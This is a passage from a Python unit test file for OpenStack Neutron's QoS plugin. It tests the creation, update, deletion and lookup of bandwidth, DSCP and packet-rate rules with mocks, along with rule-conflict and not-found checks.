qos_exc.QosRuleNotSupported,
self.qos_plugin.validate_policy_for_port,
self.ctxt, self.policy, port)
def test_validate_policy_for_port_all_rules_valid(self):
port = {'id': uuidutils.generate_uuid()}
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_port",
return_value=True
):
self.policy.rules = [self.rule]
try:
self.qos_plugin.validate_policy_for_port(
self.ctxt, self.policy, port)
except qos_exc.QosRuleNotSupported:
self.fail("QosRuleNotSupported exception unexpectedly raised")
def test_validate_policy_for_network(self):
network = uuidutils.generate_uuid()
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_network",
return_value=True
):
self.policy.rules = [self.rule]
try:
self.qos_plugin.validate_policy_for_network(
self.ctxt, self.policy, network_id=network)
except qos_exc.QosRuleNotSupportedByNetwork:
self.fail("QosRuleNotSupportedByNetwork "
"exception unexpectedly raised")
def test_create_min_bw_rule_on_bound_port(self):
policy = self._get_policy()
policy.rules = [self.min_bw_rule]
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='compute:fake-zone')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
self.assertRaises(
NotImplementedError,
self.qos_plugin.create_policy_minimum_bandwidth_rule,
self.ctxt, policy.id, self.rule_data)
def test_create_min_bw_rule_on_unbound_port(self):
policy = self._get_policy()
policy.rules = [self.min_bw_rule]
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
try:
self.qos_plugin.create_policy_minimum_bandwidth_rule(
self.ctxt, policy.id, self.rule_data)
except NotImplementedError:
self.fail()
@mock.patch(
'neutron.objects.rbac_db.RbacNeutronDbObjectMixin'
'.create_rbac_policy')
@mock.patch('neutron.objects.qos.policy.QosPolicy')
def test_add_policy(self, mock_qos_policy, mock_create_rbac_policy):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy, 'QosPolicy')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
self.qos_plugin.create_policy(self.ctxt, self.policy_data)
policy_mock_call = mock.call.QosPolicy().create()
create_precommit_mock_call = mock.call.driver.call(
'create_policy_precommit', self.ctxt, mock.ANY)
create_mock_call = mock.call.driver.call(
'create_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_mock_call) <
mock_manager.mock_calls.index(create_precommit_mock_call) <
mock_manager.mock_calls.index(create_mock_call))
def test_add_policy_with_extra_tenant_keyword(self, *mocks):
policy_id = uuidutils.generate_uuid()
project_id = uuidutils.generate_uuid()
tenant_policy = {
'policy': {'id': policy_id,
'project_id': project_id,
'tenant_id': project_id,
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}}
policy_details = {'id': policy_id,
'project_id': project_id,
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}
with mock.patch('neutron.objects.qos.policy.QosPolicy') as QosMocked:
self.qos_plugin.create_policy(self.ctxt, tenant_policy)
QosMocked.assert_called_once_with(self.ctxt, **policy_details)
@mock.patch.object(policy_object.QosPolicy, "get_object")
@mock.patch(
'neutron.objects.rbac_db.RbacNeutronDbObjectMixin'
'.create_rbac_policy')
@mock.patch.object(policy_object.QosPolicy, 'update')
def test_update_policy(self, mock_qos_policy_update,
mock_create_rbac_policy, mock_qos_policy_get):
mock_qos_policy_get.return_value = self.policy
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy_update, 'update')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
fields = obj_utils.get_updatable_fields(
policy_object.QosPolicy, self.policy_data['policy'])
self.qos_plugin.update_policy(
self.ctxt, self.policy.id, {'policy': fields})
self._validate_driver_params('update_policy', self.ctxt)
policy_update_mock_call = mock.call.update()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_update_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
@mock.patch('neutron.objects.db.api.get_object', return_value=None)
@mock.patch.object(policy_object.QosPolicy, 'delete')
def test_delete_policy(self, mock_qos_policy_delete, mock_api_get_policy):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy_delete, 'delete')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
self.qos_plugin.delete_policy(self.ctxt, self.policy.id)
self._validate_driver_params('delete_policy', self.ctxt)
policy_delete_mock_call = mock.call.delete()
delete_precommit_mock_call = mock.call.driver.call(
'delete_policy_precommit', self.ctxt, mock.ANY)
delete_mock_call = mock.call.driver.call(
'delete_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_delete_mock_call) <
mock_manager.mock_calls.index(delete_precommit_mock_call) <
mock_manager.mock_calls.index(delete_mock_call))
@mock.patch.object(policy_object.QosPolicy, "get_object")
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'create')
def test_create_policy_rule(self, mock_qos_rule_create,
mock_qos_policy_get):
_policy = copy.copy(self.policy)
setattr(_policy, "rules", [])
mock_qos_policy_get.return_value = _policy
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_create, 'create')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
with mock.patch('neutron.objects.qos.qos_policy_validator'
'.check_bandwidth_rule_conflict',
return_value=None), \
mock.patch(
'neutron.objects.qos.qos_policy_validator'
'.check_min_pps_rule_conflict', return_value=None):
self.qos_plugin.create_policy_bandwidth_limit_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
rule_create_mock_call = mock.call.create()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_create_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_create_policy_rule_check_rule_min_less_than_max(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.qos_plugin.create_policy_minimum_bandwidth_rule(
self.ctxt, _policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
self.mock_qos_load_attr.assert_called_once_with('rules')
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_max_more_than_min(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.qos_plugin.create_policy_bandwidth_limit_rule(
self.ctxt, _policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
self.mock_qos_load_attr.assert_called_once_with('rules')
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_bwlimit_less_than_minbw(self):
_policy = self._get_policy()
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_minbw_gr_than_bwlimit(self):
_policy = self._get_policy()
self.rule_data['minimum_bandwidth_rule']['min_kbps'] = 1000000
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_bandwidth_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
new_rule_data = {
'bandwidth_limit_rule': {
'max_kbps': 5000,
'direction': self.rule.direction
}
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'update')
def test_update_policy_rule(self, mock_qos_rule_update):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_update, 'update')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.rule.get_rules',
return_value=[self.rule]), mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
rule_update_mock_call = mock.call.update()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_update_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_update_policy_rule_check_rule_min_less_than_max(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
rules = [self.rule, self.min_bw_rule]
setattr(_policy, "rules", rules)
self.mock_qos_load_attr.reset_mock()
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_bandwidth_rule(
self.ctxt, self.min_bw_rule.id,
self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_rule_check_rule_bwlimit_less_than_minbw(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
self.rule_data['minimum_bandwidth_rule']['min_kbps'] = 1000
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_minimum_bandwidth_rule,
self.ctxt, self.min_bw_rule.id,
self.policy.id, self.rule_data)
def test_update_policy_rule_check_rule_minbw_gr_than_bwlimit(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_bandwidth_rule(
self.ctxt, self.min_bw_rule.id, self.policy.id,
self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id,
self.policy.id, self.rule_data)
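    # Fresh QosPolicy object built from the shared fixture data.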
def _get_policy(self):
return policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
def test_update_policy_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id,
self.rule_data)
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'delete')
def test_delete_policy_rule(self, mock_qos_rule_delete):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_delete, 'delete')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.rule])
self.qos_plugin.delete_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, _policy.id)
self._validate_driver_params('update_policy', self.ctxt)
rule_delete_mock_call = mock.call.delete()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_delete_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_delete_policy_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, _policy.id)
def test_get_policy_bandwidth_limit_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.rule.id)
def test_get_policy_bandwidth_limit_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_bandwidth_limit_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_bandwidth_limit_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_bandwidth_limit_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy,
self.ctxt, self.policy.id)
def test_get_policy_bandwidth_limit_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_get_policy_bandwidth_limit_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_bandwidth_limit_rules,
self.ctxt, self.policy.id)
def test_create_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.create_policy_dscp_marking_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.update_policy_dscp_marking_rule(
self.ctxt, self.dscp_rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.delete_policy_dscp_marking_rule(
self.ctxt, self.dscp_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_get_policy_dscp_marking_rules(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosDscpMarkingRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_dscp_marking_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_dscp_marking_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosDscpMarkingRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_dscp_marking_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, qos_policy_id=self.policy.id,
_pager=mock.ANY, filter='filter_id')
def test_get_policy_dscp_marking_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_dscp_marking_rule,
self.ctxt, self.dscp_rule.id, self.policy.id)
def test_get_policy_dscp_marking_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_dscp_marking_rules,
self.ctxt, self.policy.id)
def test_get_policy_minimum_bandwidth_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_minimum_bandwidth_rule(
self.ctxt, self.rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.rule.id)
def test_get_policy_minimum_bandwidth_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_minimum_bandwidth_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_minimum_bandwidth_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_minimum_bandwidth_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_minimum_bandwidth_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_bandwidth_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_get_policy_minimum_bandwidth_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_bandwidth_rules,
self.ctxt, self.policy.id)
def test_create_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
def test_delete_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_verify_bad_method_call(self):
self.assertRaises(AttributeError, getattr, self.qos_plugin,
'create_policy_bandwidth_limit_rules')
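# The rule-type detail tests below stub out supported_rule_type_details so
# get_rule_type() can be exercised without loading real QoS drivers; the
# plugin is expected to echo the rule type name and attach the per-driver
# parameter descriptions unchanged.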
def test_get_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'max_kbps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_BANDWIDTH_LIMIT)
self.assertEqual(
qos_consts.RULE_TYPE_BANDWIDTH_LIMIT,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_BANDWIDTH_LIMIT)
def test_get_rule_types(self):
filters = {'type': 'type_id'}
with mock.patch.object(qos_plugin.QoSPlugin, 'supported_rule_types',
return_value=qos_consts.VALID_RULE_TYPES):
types = self.qos_plugin.get_rule_types(self.ctxt, filters=filters)
self.assertEqual(sorted(qos_consts.VALID_RULE_TYPES),
sorted(type_['type'] for type_ in types))
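# The ordering test below attaches several independent mocks to one parent
# mock.Mock(); the parent's mock_calls attribute then records the calls of
# all attached children in a single interleaved list, which is what makes it
# possible to assert that the rule DB operation happens strictly before the
# driver manager is asked to push the updated policy.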
@mock.patch('neutron.objects.ports.Port')
@mock.patch('neutron.objects.qos.policy.QosPolicy')
def test_rule_notification_and_driver_ordering(self, qos_policy_mock,
port_mock):
rule_cls_mock = mock.Mock()
rule_cls_mock.rule_type = 'fake'
rule_actions = {'create': [self.ctxt, rule_cls_mock,
self.policy.id, {'fake_rule': {}}],
'update': [self.ctxt, rule_cls_mock,
self.rule.id,
self.policy.id, {'fake_rule': {}}],
'delete': [self.ctxt, rule_cls_mock,
self.rule.id, self.policy.id]}
mock_manager = mock.Mock()
mock_manager.attach_mock(qos_policy_mock, 'QosPolicy')
mock_manager.attach_mock(port_mock, 'Port')
mock_manager.attach_mock(rule_cls_mock, 'RuleCls')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
for action, arguments in rule_actions.items():
mock_manager.reset_mock()
method = getattr(self.qos_plugin, "%s_policy_rule" % action)
method(*arguments)
# some actions get rule from policy
get_rule_mock_call = getattr(
mock.call.QosPolicy.get_policy_obj().get_rule_by_id(),
action)()
# some actions construct rule from class reference
rule_mock_call = getattr(mock.call.RuleCls(), action)()
driver_mock_call = mock.call.driver.call('update_policy',
self.ctxt, mock.ANY)
if rule_mock_call in mock_manager.mock_calls:
action_index = mock_manager.mock_calls.index(rule_mock_call)
else:
action_index = mock_manager.mock_calls.index(
get_rule_mock_call)
self.assertLess(
action_index, mock_manager.mock_calls.index(driver_mock_call))
def test_create_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.create_policy_packet_rate_limit_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_create_policy_pps_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.pps_rule])
new_rule_data = {
'packet_rate_limit_rule': {
'max_kpps': 400,
'direction': self.pps_rule.direction
}
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_packet_rate_limit_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_update_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.update_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_pps_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id,
self.rule_data)
def test_delete_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.delete_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_pps_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, _policy.id)
def test_get_policy_packet_rate_limit_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.pps_rule.id)
def test_get_policy_packet_rate_limit_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_packet_rate_limit_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_packet_rate_limit_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_packet_rate_limit_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_packet_rate_limit_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id)
def test_get_policy_packet_rate_limit_rules_for_nonexistent_policy(self):
